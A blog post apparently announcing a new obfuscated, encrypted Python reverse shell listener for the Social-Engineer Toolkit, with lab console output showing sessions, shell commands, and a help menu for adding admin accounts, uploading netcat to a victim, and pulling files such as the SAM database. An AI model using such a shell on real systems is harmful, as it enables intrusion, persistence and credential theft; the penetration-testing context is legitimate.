While I have been working frantically on The Social-Engineer Toolkit (SET) v1.3, I wanted to give a little teaser on a new addition that I've been working on. I have to say this is probably one of the hardest tasks I've built into SET and coded in Python. Building a raw multi-threaded socket handler that can distinguish between inter-communicating threads and handling them in different channels was a bit of a rough task since Python threads are pretty immature overall. Anyways, the new addition is going to be a purely python driven SET based listener and shell that handles a slew of tasks. Good news is its heavily obfuscated, will leverage encrypted communications, and act as a reverse shell. My thoughts on this is having a purely SET driven interactive payload instead of leveraging Metasploit based payloads. While the payload support within SET will still include Metasploit, this will allow additional avenues and capabilities to be put into SET and grow it and become more independent over time. Here is a small teaser of the shell. I don't have a release date yet, I'm hoping by end of month. Something to add is that the socket storage is done in memory, so theoretically I can add the ability to perform tasks on each shell at once. So if you wanted to download the SAM database on 30 systems at once, this will be possible instantaneously. The Social-Engineer Toolkit (SET) is listening on: 0.0.0.0:80 [fusion_builder_container hundred_percent="yes" overflow="visible"][fusion_builder_row][fusion_builder_column type="1_1" background_position="left top" background_color="" border_size="" border_color="" border_style="solid" spacing="yes" background_image="" background_repeat="no-repeat" padding="" margin_top="0px" margin_bottom="0px" class="" id="" animation_type="" animation_speed="0.3" animation_direction="left" hide_on_mobile="no" center_content="no" min_height="none"][*] Connection received from: 172.16.32.131 [*] Establishing encrypted tunnel... *** Pick the number of the shell you want *** 1: 172.16.32.131 Enter your numeric choice: 1 [*] Dropping into the Social-Engineer Toolkit Interactive Shell. set> set> set> [*] Connection received from: 172.16.32.132 [*] Connection received from: 172.16.32.133 [*] Connection received from: 172.16.32.134 set> shell [*] Dropping into a shell. Enter your shell commands below. set/command_shell>ipconfig Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : localdomain IP Address. . . . . . . . . . . . : 172.16.32.131 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 172.16.32.2 set/command_shell>quit set> quit [*] Exiting the Social-Engineer Toolkit (SET) Interactive Shell. *** Pick the number of the shell you want *** 1: 172.16.32.131 2: 172.16.32.132 3: 172.16.32.133 4: 172.16.32.134 Enter your numeric choice: 3 set> [*] Dropping into the Social-Engineer Toolkit Interactive Shell. set> shell set> [*] Dropping into a shell. Enter your shell commands below. set/command_shell>ipconfig set> Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : localdomain IP Address. . . . . . . . . . . . : 172.16.32.133 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 172.16.32.2 set> ? Welcome to the Social-Engineer Toolkit Help Menu. Enter the following commands for usage: Command: shell Explanation: drop into a command shell Example: shell Command: localadmin Explanation: adds a local admin to the system Example: localadmin bob p@55w0rd! Command: domainadmin Explanation: adds a local admin to the system Example: domainadmin bob p@55w0rd! Command: download_file Explanation: downloads a file locally to the SET root directory. Example: download_file C:boot.ini Command upload_file Explanation: uploads a file to the victim system Example: upload_file /root/nc.exe C:nc.exe set/command_shell> quit set> localadmin testing123 asfsdfdsfdsfds set> [*] Attempting to add a user account with administrative permissions. [*] User add completed. Check the system to ensure it worked correctly. set>[/fusion_builder_column][/fusion_builder_row][/fusion_builder_container]